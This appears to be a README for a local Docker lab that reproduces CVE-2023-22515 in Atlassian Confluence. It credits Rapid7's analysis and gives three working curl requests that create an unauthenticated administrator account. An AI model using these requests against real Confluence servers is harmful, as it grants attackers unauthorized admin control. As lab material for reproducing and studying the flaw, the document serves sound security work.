This vulnerability affects Confluence Server and Confluence Data Center. It allows an unauthenticated attacker to create an administrator Confluence user.
Credits for the proof-of-concept fully go to Rapid7: https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
Run it:
docker-compose up
It takes a few minutes to start up. When you see the line Server startup in [xx] milliseconds in the logs:
- Browse to http://localhost:8090
- Get a trial license (this won't work without one)
- It'll take a while to configure, make sure you have 3-4 GB of RAM
- Start with an "Empty Site"
- Click on "Manager users and groups in Confluence"
- Set a sample administrator username and password
Taken from https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
curl -vk "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=malicious-user&fullName=malicious&email=malicious%40localhost&password=malicious&confirm=malicious&setup-next-button=Next" http://localhost:8090/setup/setupadministrator.action
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://localhost:8090/setup/finishsetup.action
After that, browse to the list of users and you'll notice that a new, malicious user has been created:
